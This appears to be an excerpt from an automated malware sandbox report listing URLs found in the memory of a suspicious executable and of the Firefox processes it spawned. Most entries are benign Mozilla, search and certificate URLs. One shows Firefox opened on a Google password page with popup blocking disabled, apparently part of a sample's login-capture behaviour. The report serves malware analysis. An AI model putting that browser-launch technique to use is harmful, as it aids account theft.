Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketShowLessFrequentlyCap
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedDurationhttp://mozilla.org/#/properties/featureIds
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedEnrollment
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabled
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabledhttp://mozilla.org/#/properties/quickSugg
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestEnabled
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsNonSponsoredEnabled
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabled
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndex
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariation
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataType
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsEnabled
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenario
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenariohttp://mozilla.org/#/properties/weatherFeatureGa
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMap
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShouldShowOnboardingDialog
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShowOnboardingDialogAfterNRestarts
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabled
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredIndex
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/recordNavigationalSuggestionTelemetry
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/referenceBranch
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/schemaVersion
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showExposureResults
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showExposureResultshttp://mozilla.org/#/properties/quickSuggestEnabl
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showSearchTermsFeatureGate
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/slug
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingDescription
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingName
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherFeatureGate
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLength
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLengthCap
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLengthCapresource://normandy/lib/PreferenceExp
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsresource://services-settings/Utils.sys.mjs
Source: firefox.exe, 00000019.00000003.2953976180.0000025E893A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2884588498.0000025E81E4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2884866102.0000025E81E13000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3081282197.0000025E8311A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2928916659.0000025E892AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3065146353.0000025E81E3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2956838573.0000025E891C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3084718430.0000025E83403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2958021612.0000025E83DD0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3020548386.0000025E7D103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3044134793.0000025E81137000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3039979682.0000025E80DFC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2884418416.0000025E81E6C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2883993425.0000025E81E23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2929896768.0000025E892AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3015823343.0000025E7C9DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3047335193.0000025E81403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3053736608.0000025E818EA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3050848815.0000025E8169D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2929393111.0000025E8928B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: file.exe, 00000000.00000003.2105697595.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2783822067.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2909020887.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3062161151.0000025E81C49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2105697595.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2783822067.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2909020887.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3062161151.0000025E81C49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3018136513.0000025E7CE7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3013624425.0000025E7C8DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 00000019.00000003.2953976180.0000025E893A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2953976180.0000025E893A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3013624425.0000025E7C8DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3018136513.0000025E7CE7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3018136513.0000025E7CE7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 00000019.00000002.3069732243.0000025E825BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 00000019.00000002.3047335193.0000025E81403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3040789860.0000025E80E47000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D2DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3083631249.0000025E83303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3052972846.0000025E81703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2960468168.0000025E825B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D2B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul:
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D2B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/BrowserSearchTeleme
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D2B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/firefox-view-notifi
Source: file.exe, 00000000.00000003.2105697595.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2783822067.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2909020887.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2953976180.0000025E893A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3062161151.0000025E81C49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2105697595.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2783822067.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2909020887.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2953976180.0000025E893A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3062161151.0000025E81C49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000019.00000002.3033711233.0000025E802F0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000003.2874159292.0000025E81138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2874853592.0000025E8116F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2873550106.0000025E8111D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2874578651.0000025E81153000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2869331652.0000025E80F00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/removeBookmarksOnPopupHidden
Source: file.exe, 00000000.00000003.2078373325.0000000005ECC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078647228.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078431420.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2754320993.0000000005B66000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2874156786.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2873910237.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2873775956.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000019.00000003.2956838573.0000025E8915A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3080260742.0000025E82916000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000019.00000002.3011428041.0000025E72C70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser-check--disable-popup-blockin
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80CB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3062161151.0000025E81CA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3081282197.0000025E83103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3062161151.0000025E81CE6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3068152789.0000025E82433000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D06000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etpcolor-mix(in
Source: firefox.exe, 00000019.00000003.2936265181.0000025E89776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2944106406.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000019.00000002.3009852946.0000025E71011000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: firefox.exe, 00000019.00000002.3013624425.0000025E7C8AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3001120503.0000016C701CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31DE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: firefox.exe, 00000019.00000002.3013624425.0000025E7C8AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3001120503.0000016C701CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31DE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 00000019.00000002.3069732243.0000025E82594000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3040789860.0000025E80E47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D2B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 00000019.00000003.2956838573.0000025E8914A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000019.00000003.2956838573.0000025E8914A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000019.00000003.2956838573.0000025E8914A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000019.00000003.2956838573.0000025E8914A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: file.exe, 00000000.00000003.2078373325.0000000005ECC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078647228.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078431420.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2754320993.0000000005B66000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2874156786.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2873910237.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2873775956.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2078373325.0000000005ECC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078647228.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078431420.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2754320993.0000000005B66000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2874156786.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2873910237.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2873775956.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2078373325.0000000005ECC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078647228.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078431420.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2754320993.0000000005B66000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2874156786.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2873910237.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2873775956.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
